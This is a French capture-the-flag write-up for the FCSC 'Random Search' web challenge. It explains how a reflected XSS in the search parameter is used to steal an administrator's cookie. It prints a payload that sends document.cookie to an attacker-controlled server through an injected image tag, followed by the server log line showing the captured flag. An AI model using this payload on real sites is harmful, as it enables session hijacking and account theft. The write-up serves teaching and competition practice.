# Random Search - web xss

**Challenge**

Pourrez-vous voler le cookie de l'administrateur qui visite les pages ?

http://challenges2.france-cybersecurity-challenge.fr:5001/


**Solution**

La page principale du site ressemble à :

![index](random_search_index.png)

On a aussi un formulaire de contact :

![contact](random_search_contact.png)

Si on choisit de rechercher la chaîne `plop`, on a le résultat :

![search](random_search_search.png)

On a donc un rappel du motif de recherche, passé en `GET` dans l'url. Il est assez clair qu'on recherche une XSS, donc tentons `<script>alert('facile');</script>` :

![xss](random_search_xss.png)

C'est bien ça. On doit donc l'utiliser pour piquer les cookies de l'administrateur, et le formulaire de contact est là pour ça. On va donc lui proposer une URL de son moteur de recherche avec comme motif une XSS qui va chercher une image sur un serveur que l'on maîtrise, tout en passant en paramètre ses cookies. Quelque chose comme ceci :

`<script>document.write("<img src='http://[mon_serveur]/?"+document.cookie+"'>");</script>`

On tente le motif dans le formulaire, on en profite pour vérifier que ça fonctionne, on copie/colle l'url obtenue dans le formulaire de contact et on surveille les logs de notre serveur :

```
151.80.29.147 - - [23/Apr/2021:22:32:17 +0200] "GET /?admin=FCSC{4e0451cc88a9a96e7e46947461382008d8c8f4304373b8907964675c27d7c633} HTTP/1.1" 200 839 "http://random-search-web:5001/" "Mozilla/5.0 (X11; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0"
```